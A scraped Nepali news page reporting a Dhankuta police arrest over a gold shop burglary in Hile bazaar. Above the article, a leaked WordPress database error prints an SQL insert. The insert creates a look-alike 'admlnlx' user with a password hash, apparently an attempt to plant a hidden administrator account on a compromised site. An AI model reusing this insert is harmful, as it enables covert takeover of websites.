WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQFaDHu8avBO/d7wMP9JHymSFlGRCA1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 13:45:22', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
हिलेमा सुन चोर्ने पक्राउ – Gaule Khabar

हिलेमा सुन चोर्ने पक्राउ

हिलेमा सुन चोर्ने पक्राउ

धनकुटा, माघ २६–

धनकुटा नगरपालिका–१ हिले बजारको पसलबाट सुन चोरी गर्ने पक्राउ परेको जिल्ला प्रहरी कार्यालय धनकुटाले जनाएको छ ।

मङ्गलबार धनकुटामा सार्वजनिक गरिएका सुन चोरी गर्ने सुनसरी इटहरी उपमहानगरपालिका–५ का २३ वर्षीय मिलन अधिकारी खत्री रहेको जिल्ला प्रहरी कार्यालयका प्रहरी उपरीक्षक सुदीप राजभण्डारीले बताउनुभयो ।

गत माघ २२ गते राति करिब २ बजे रेजिन धमलाको सुन पसलको ढिक फोरेर रु तीन लाख ५० हजार बराबरको सुन तथा चाँदीका गहना चोरी गरेको खत्रीले स्वीकार गरेको प्रहरीले जनाएको छ । धनकुटाको हिले बजारमा पक्राउ परेका खत्रीले चोरी गरेको सुनचाँदी समेत प्रहरीले नियन्त्रण लिएको जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका